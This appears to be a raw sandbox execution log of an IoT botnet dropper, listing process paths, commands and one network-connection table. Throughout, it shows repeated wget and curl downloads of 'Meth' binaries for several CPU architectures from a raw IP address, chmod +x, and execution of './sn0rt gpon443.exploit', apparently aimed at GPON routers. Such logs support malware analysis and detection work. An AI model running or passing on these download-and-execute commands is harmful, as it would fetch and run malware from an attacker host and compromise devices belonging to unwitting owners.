[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto | Count |
| HR | 45.95.168.230:80 | | tcp | 26 |